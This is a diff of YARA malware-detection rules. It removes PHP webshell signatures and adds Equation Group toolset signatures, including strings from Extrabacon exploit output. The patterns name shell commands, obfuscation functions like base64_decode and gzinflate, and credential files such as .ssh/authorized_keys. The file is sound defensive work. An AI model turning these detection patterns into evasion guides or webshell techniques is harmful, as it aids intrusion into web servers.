-		$cpayload5 = /\bsystem[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload6 = /\bpopen[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload7 = /\bproc_open[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload8 = /\bpcntl_exec[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload9 = /\bassert[\n\t ]{0,500}\([^)0]/ nocase wide ascii
-		$cpayload10 = /\bpreg_replace[\n\t ]{0,500}\([^\)]{1,100}\/[ismxADSUXju]{0,11}(e|\\x65)/ nocase wide ascii
-		$cpayload12 = /\bmb_ereg_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload13 = /\bmb_eregi_replace[\t ]{0,500}\([^\)]{1,100}'e'/ nocase wide ascii
-		$cpayload20 = /\bcreate_function[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload21 = /\bReflectionFunction[\n\t ]{0,500}(\([^)]|\/\*)/ nocase wide ascii
-		$cpayload22 = /fetchall\(PDO::FETCH_FUNC[\n\t ]{0,500}[,}\)]/ nocase wide ascii
-		$m_cpayload_preg_filter1 = /\bpreg_filter[\n\t ]{0,500}(\([^\)]|\/\*)/ nocase wide ascii
-		$m_cpayload_preg_filter2 = "'|.*|e'" nocase wide ascii
-		$cobfs1 = "gzinflate" fullword nocase wide ascii
-		$cobfs2 = "gzuncompress" fullword nocase wide ascii
-		$cobfs3 = "gzdecode" fullword nocase wide ascii
-		$cobfs4 = "base64_decode" fullword nocase wide ascii
-		$cobfs5 = "pack" fullword nocase wide ascii
-		$cobfs6 = "undecode" fullword nocase wide ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus66 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
-		$gen_much_sus90 = "r00t" fullword wide ascii
-		$gen_much_sus91 = "xp_cmdshell" fullword wide ascii
-		$gen_much_sus92 = "base64_decode(base64_decode(" fullword wide ascii
-		$gen_much_sus93 = "eval(\"/*" wide ascii
-		$gen_much_sus94 = "=$_COOKIE;" wide ascii
-		$gif = { 47 49 46 38 }
+		$s1 = "30.40.50.60:9342" fullword ascii wide
 
 	condition:
-		(( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( ( not any of ( $cfp* ) and ( any of ( $callback* ) or all of ( $m_callback* ) ) ) or ( any of ( $cpayload* ) or all of ( $m_cpayload_preg_filter* ) ) ) and ( any of ( $cobfs* ) ) and ( filesize < 1KB or ( filesize < 3KB and ( ( $gif at 0 or ( filesize < 4KB and ( 1 of ( $gen_much_sus* ) or 2 of ( $gen_bit_sus* ) ) ) or ( filesize < 20KB and ( 2 of ( $gen_much_sus* ) or 3 of ( $gen_bit_sus* ) ) ) or ( filesize < 50KB and ( 2 of ( $gen_much_sus* ) or 4 of ( $gen_bit_sus* ) ) ) or ( filesize < 100KB and ( 2 of ( $gen_much_sus* ) or 6 of ( $gen_bit_sus* ) ) ) or ( filesize < 150KB and ( 3 of ( $gen_much_sus* ) or 7 of ( $gen_bit_sus* ) ) ) or ( filesize < 500KB and ( 4 of ( $gen_much_sus* ) or 8 of ( $gen_bit_sus* ) ) ) ) or #obf1 > 10 ) ) )
+		1 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Eval : FILE
+rule SIGNATURE_BASE_EQGRP_Extrabacon_Output
 {
 	meta:
-		description = "PHP webshell which eval()s another included file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "995fcc34-f91e-5c9c-97b1-84eed1714d40"
-		date = "2021-01-13"
-		modified = "2023-04-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1848-L1897"
+		description = "EQGRP Toolset Firewall - Extrabacon exploit output"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b2070ed7-e95a-534a-8f27-63c5ca9251b4"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1274-L1290"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3a07e9188028efa32872ba5b6e5363920a6b2489"
-		hash = "ab771bb715710892b9513b1d075b4e2c0931afb6"
-		hash = "202dbcdc2896873631e1a0448098c820c82bcc8385a9f7579a0dc9702d76f580"
-		hash = "b51a6d208ec3a44a67cce16dcc1e93cdb06fe150acf16222815333ddf52d4db8"
-		logic_hash = "a7e9632c495e5d4cc883e2593c8ebe41cdf6a18b54bd6dfd3aec85352f19321c"
+		logic_hash = "5e71a4380dd30e68d89add1718976d3207a161d2d61fd4c3250fc4b10a0f53a0"
 		score = 75
-		quality = 21
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$payload1 = "eval" fullword wide ascii
-		$payload2 = "assert" fullword wide ascii
-		$include1 = "$_FILE" wide ascii
-		$include2 = "include" wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = "|###[ SNMPresponse ]###" fullword ascii
+		$s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii
+		$s3 = "[+] building payload for mode pass-disable" fullword ascii
+		$s4 = "[+] Executing:  extrabacon" fullword ascii
+		$s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii
 
 	condition:
-		filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and 1 of ( $payload* ) and 1 of ( $include* )
+		2 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Includer_Tiny : FILE
+rule SIGNATURE_BASE_EQGRP_Unique_Strings
 {
 	meta:
-		description = "Suspicious: Might be PHP webshell includer, check the included file"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9bf96ddc-d984-57eb-9803-0b01890711b5"
-		date = "2021-04-17"
-		modified = "2023-07-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1899-L1944"
+		description = "EQGRP Toolset Firewall - Unique strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08f5f1e3-ce4e-54ef-922f-50446edfcd70"
+		date = "2016-08-16"
+		modified = "2023-12-05"
+		reference = "Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1292-L1305"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0687585025f99596508783b891e26d6989eec2ba"
-		hash = "9e856f5cb7cb901b5003e57c528a6298341d04dc"
-		hash = "b3b0274cda28292813096a5a7a3f5f77378b8905205bda7bb7e1a679a7845004"
-		logic_hash = "e1efb6384009def30d845650fd0dd77319c3c7b4402cca074ca5c2a06372ab58"
+		logic_hash = "070358ec9cccb5d9daa4e5a016d4f9a988b600d675484f06dc9a897cadf7af0c"
 		score = 75
-		quality = 42
-		tags = "FILE"
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$php_include1 = /include\(\$_(GET|POST|REQUEST)\[/ nocase wide ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
+		$s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
+		$s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)"
 
 	condition:
-		filesize < 100 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and any of ( $php_include* )
+		1 of them
 }
-rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic : FILE
+rule SIGNATURE_BASE_EQGRP_RC5_RC6_Opcode
 {
 	meta:
-		description = "PHP webshell using function name from variable, e.g. $a='ev'.'al'; $a($code)"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "58ad94bc-93c8-509c-9d3a-c9a26538d60c"
-		date = "2021-01-13"
-		modified = "2024-12-09"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L1946-L2019"
+		description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b12a1a2c-8d32-5318-a658-6aa1a08c3263"
+		date = "2016-08-17"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1307-L1326"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "65dca1e652d09514e9c9b2e0004629d03ab3c3ef"
-		hash = "b8ab38dc75cec26ce3d3a91cb2951d7cdd004838"
-		hash = "c4765e81550b476976604d01c20e3dbd415366df"
-		hash = "2e11ba2d06ebe0aa818e38e24a8a83eebbaae8877c10b704af01bf2977701e73"
-		logic_hash = "c49434662defad4945639887f4a6537c44a5559f83646f378f848b4aa4ba3c3f"
-		score = 60
-		quality = -156
-		tags = "FILE"
+		logic_hash = "a79208c5924e1d5cc9db922f80403514e516eadb725393c1ebc9a6236ca90b98"
+		score = 75
+		quality = 85
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
 
 	strings:
-		$pd_fp1 = "whoops_add_stack_frame" wide ascii
-		$pd_fp2 = "new $ec($code, $mode, $options, $userinfo);" wide ascii
-		$pd_fp3 = "($i)] = 600;" ascii
-		$php_short = "<?" wide ascii
-		$no_xml1 = "<?xml version" nocase wide ascii
-		$no_xml2 = "<?xml-stylesheet" nocase wide ascii
-		$no_asp1 = "<%@LANGUAGE" nocase wide ascii
-		$no_asp2 = /<script language="(vb|jscript|c#)/ nocase wide ascii
-		$no_pdf = "<?xpacket"
-		$php_new1 = /<\?=[^?]/ wide ascii
-		$php_new2 = "<?php" nocase wide ascii
-		$php_new3 = "<script language=\"php" nocase wide ascii
-		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
-		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
-		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
-		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
-		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
-		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
-		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
-		$dynamic8 = /\$\{[^}]{1,20}}(\[[^\]]{1,20}\])?\(\$\{/ wide ascii
-		$fp1 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 24 63 29 3B }
-		$fp2 = { 3C 3F 70 68 70 0A 0A 24 61 28 24 62 20 3D 20 33 2C 20 2E 2E 2E 20 24 63 29 3B }
-		$fp3 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 74 61 74 69 63 3A 3A 24 62 28 29 3B}
-		$fp4 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 6E 65 77 20 73 65 6C 66 3A 3A 24 62 28 29 3B }
-		$fp5 = { 3C 3F 70 68 70 0A 0A 24 61 20 3D 20 5C 22 7B 24 76 61 72 43 61 6C 6C 61 62 6C 65 28 29 7D 5C 22 3B }
-		$fp6 = "// TODO error about missing expression"
-		$fp7 = "// This is an invalid location for an attribute, "
-		$fp8 = "/* Auto-generated from php/php-langspec tests */"
-		$fp_dynamic1 = /"\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
+		$s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B }
 
 	condition:
-		filesize > 20 and filesize < 200 and ( ( ( $php_short in ( 0 .. 100 ) or $php_short in ( filesize -1000 .. filesize ) ) and not any of ( $no_* ) ) or any of ( $php_new* ) ) and ( any of ( $dynamic* ) ) and not any of ( $pd_fp* ) and not 1 of ( $fp* )
+		1 of them
 }
-
-rule SIGNATURE_BASE_WEBSHELL_PHP_Dynamic_Big : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Implant : FILE
 {
 	meta:
-		description = "PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a5caab93-7b94-59d7-bbca-f9863e81b9e5"
-		date = "2021-02-07"
-		modified = "2024-02-23"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_webshells.yar#L2021-L2338"
+		description = "EquationGroup Malware - file modifyAudit_Implant.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0321f6c0-2250-5991-a1d9-f0598e13c665"
+		date = "2017-01-13"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1337-L1353"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6559bfc4be43a55c6bb2bd867b4c9b929713d3f7f6de8111a3c330f87a9b302c"
-		hash = "9e82c9c2fa64e26fd55aa18f74759454d89f968068d46b255bd4f41eb556112e"
-		hash = "6def5296f95e191a9c7f64f7d8ac5c529d4a4347ae484775965442162345dc93"
-		hash = "dadfdc4041caa37166db80838e572d091bb153815a306c8be0d66c9851b98c10"
-		hash = "0a4a292f6e08479c04e5c4fdc3857eee72efa5cd39db52e4a6e405bf039928bd"
-		hash = "4326d10059e97809fb1903eb96fd9152cc72c376913771f59fa674a3f110679e"
-		hash = "b49d0f942a38a33d2b655b1c32ac44f19ed844c2479bad6e540f69b807dd3022"
-		hash = "575edeb905b434a3b35732654eedd3afae81e7d99ca35848c509177aa9bf9eef"
-		hash = "ee34d62e136a04e2eaf84b8daa12c9f2233a366af83081a38c3c973ab5e2c40f"
-		logic_hash = "9e033789ab2f3d28bf48d8102edf51daf84a1d61d50cd59f3810be7c07a8e8d9"
-		score = 50
-		quality = -361
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		importance = 70
-
-	strings:
-		$dex = { 64 65 ( 78 | 79 ) 0a 30 }
-		$pack = { 50 41 43 4b 00 00 00 02 00 }
-		$new_php2 = "<?php" nocase wide ascii
-		$new_php3 = "<script language=\"php" nocase wide ascii
-		$php_short = "<?"
-		$dynamic1 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\$/ wide ascii
-		$dynamic2 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\("/ wide ascii
-		$dynamic3 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\('/ wide ascii
-		$dynamic4 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(str/ wide ascii
-		$dynamic5 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(\)/ wide ascii
-		$dynamic6 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(@/ wide ascii
-		$dynamic7 = /\$[a-zA-Z_\x80-\xff][a-zA-Z0-9_\x80-\xff\[\]'"]{0,20}\s{0,20}\(base64_decode/ wide ascii
-		$dynamic8 = "eval(" wide ascii
-		$gen_bit_sus1 = /:\s{0,20}eval}/ nocase wide ascii
-		$gen_bit_sus2 = /\.replace\(\/\w\/g/ nocase wide ascii
-		$gen_bit_sus6 = "self.delete"
-		$gen_bit_sus9 = "\"cmd /c" nocase
-		$gen_bit_sus10 = "\"cmd\"" nocase
-		$gen_bit_sus11 = "\"cmd.exe" nocase
-		$gen_bit_sus12 = "%comspec%" wide ascii
-		$gen_bit_sus13 = "%COMSPEC%" wide ascii
-		$gen_bit_sus18 = "Hklm.GetValueNames();" nocase
-		$gen_bit_sus19 = "http://schemas.microsoft.com/exchange/" wide ascii
-		$gen_bit_sus21 = "\"upload\"" wide ascii
-		$gen_bit_sus22 = "\"Upload\"" wide ascii
-		$gen_bit_sus23 = "UPLOAD" fullword wide ascii
-		$gen_bit_sus24 = "fileupload" wide ascii
-		$gen_bit_sus25 = "file_upload" wide ascii
-		$gen_bit_sus27 = "zuncomp" wide ascii
-		$gen_bit_sus28 = "ase6" wide ascii
-		$gen_bit_sus29 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" fullword wide ascii
-		$gen_bit_sus29b = "abcdefghijklmnopqrstuvwxyz234567" fullword wide ascii
-		$gen_bit_sus30 = "serv-u" wide ascii
-		$gen_bit_sus31 = "Serv-u" wide ascii
-		$gen_bit_sus32 = "Army" fullword wide ascii
-		$gen_bit_sus33 = /\$_(GET|POST|REQUEST)\["\w"\]/ fullword wide ascii
-		$gen_bit_sus34 = "Content-Transfer-Encoding: Binary" wide ascii
-		$gen_bit_sus35 = "crack" fullword wide ascii
-		$gen_bit_sus44 = "<pre>" wide ascii
-		$gen_bit_sus45 = "<PRE>" wide ascii
-		$gen_bit_sus46 = "shell_" wide ascii
-		$gen_bit_sus50 = "bypass" wide ascii
-		$gen_bit_sus52 = " ^ $" wide ascii
-		$gen_bit_sus53 = ".ssh/authorized_keys" wide ascii
-		$gen_bit_sus55 = /\w'\.'\w/ wide ascii
-		$gen_bit_sus56 = /\w\"\.\"\w/ wide ascii
-		$gen_bit_sus57 = "dumper" wide ascii
-		$gen_bit_sus59 = "'cmd'" wide ascii
-		$gen_bit_sus60 = "\"execute\"" wide ascii
-		$gen_bit_sus61 = "/bin/sh" wide ascii
-		$gen_bit_sus62 = "Cyber" wide ascii
-		$gen_bit_sus63 = "portscan" fullword wide ascii
-		$gen_bit_sus65 = "whoami" fullword wide ascii
-		$gen_bit_sus67 = "$password='" fullword wide ascii
-		$gen_bit_sus68 = "$password=\"" fullword wide ascii
-		$gen_bit_sus69 = "$cmd" fullword wide ascii
-		$gen_bit_sus70 = "\"?>\"." fullword wide ascii
-		$gen_bit_sus71 = "Hacking" fullword wide ascii
-		$gen_bit_sus72 = "hacking" fullword wide ascii
-		$gen_bit_sus73 = ".htpasswd" wide ascii
-		$gen_bit_sus74 = /\btouch\(\$[^,]{1,30},/ wide ascii
-		$gen_bit_sus99 = "$password = " wide ascii
-		$gen_bit_sus100 = "();$" wide ascii
-		$gen_much_sus7 = "Web Shell" nocase
-		$gen_much_sus8 = "WebShell" nocase
-		$gen_much_sus3 = "hidded shell"
-		$gen_much_sus4 = "WScript.Shell.1" nocase
-		$gen_much_sus5 = "AspExec"
-		$gen_much_sus14 = "\\pcAnywhere\\" nocase
-		$gen_much_sus15 = "antivirus" nocase
-		$gen_much_sus16 = "McAfee" nocase
-		$gen_much_sus17 = "nishang"
-		$gen_much_sus18 = "\"unsafe" fullword wide ascii
-		$gen_much_sus19 = "'unsafe" fullword wide ascii
-		$gen_much_sus24 = "exploit" fullword wide ascii
-		$gen_much_sus25 = "Exploit" fullword wide ascii
-		$gen_much_sus26 = "TVqQAAMAAA" wide ascii
-		$gen_much_sus30 = "Hacker" wide ascii
-		$gen_much_sus31 = "HACKED" fullword wide ascii
-		$gen_much_sus32 = "hacked" fullword wide ascii
-		$gen_much_sus33 = "hacker" wide ascii
-		$gen_much_sus34 = "grayhat" nocase wide ascii
-		$gen_much_sus35 = "Microsoft FrontPage" wide ascii
-		$gen_much_sus36 = "Rootkit" wide ascii
-		$gen_much_sus37 = "rootkit" wide ascii
-		$gen_much_sus38 = "/*-/*-*/" wide ascii
-		$gen_much_sus39 = "u\"+\"n\"+\"s" wide ascii
-		$gen_much_sus40 = "\"e\"+\"v" wide ascii
-		$gen_much_sus41 = "a\"+\"l\"" wide ascii
-		$gen_much_sus42 = "\"+\"(\"+\"" wide ascii
-		$gen_much_sus43 = "q\"+\"u\"" wide ascii
-		$gen_much_sus44 = "\"u\"+\"e" wide ascii
-		$gen_much_sus45 = "/*//*/" wide ascii
-		$gen_much_sus46 = "(\"/*/\"" wide ascii
-		$gen_much_sus47 = "eval(eval(" wide ascii
-		$gen_much_sus48 = "unlink(__FILE__)" wide ascii
-		$gen_much_sus49 = "Shell.Users" wide ascii
-		$gen_much_sus50 = "PasswordType=Regular" wide ascii
-		$gen_much_sus51 = "-Expire=0" wide ascii
-		$gen_much_sus60 = "_=$$_" wide ascii
-		$gen_much_sus61 = "_=$$_" wide ascii
-		$gen_much_sus62 = "++;$" wide ascii
-		$gen_much_sus63 = "++; $" wide ascii
-		$gen_much_sus64 = "_.=$_" wide ascii
-		$gen_much_sus70 = "-perm -04000" wide ascii
-		$gen_much_sus71 = "-perm -02000" wide ascii
-		$gen_much_sus72 = "grep -li password" wide ascii
-		$gen_much_sus73 = "-name config.inc.php" wide ascii
-		$gen_much_sus75 = "password crack" wide ascii
-		$gen_much_sus76 = "mysqlDll.dll" wide ascii
-		$gen_much_sus77 = "net user" wide ascii
-		$gen_much_sus80 = "fopen(\".htaccess\",\"w" wide ascii
-		$gen_much_sus81 = /strrev\(['"]/ wide ascii
-		$gen_much_sus82 = "PHPShell" fullword wide ascii
-		$gen_much_sus821 = "PHP Shell" fullword wide ascii
-		$gen_much_sus83 = "phpshell" fullword wide ascii
-		$gen_much_sus84 = "PHPshell" fullword wide ascii
-		$gen_much_sus87 = "deface" wide ascii
-		$gen_much_sus88 = "Deface" wide ascii
-		$gen_much_sus89 = "backdoor" wide ascii
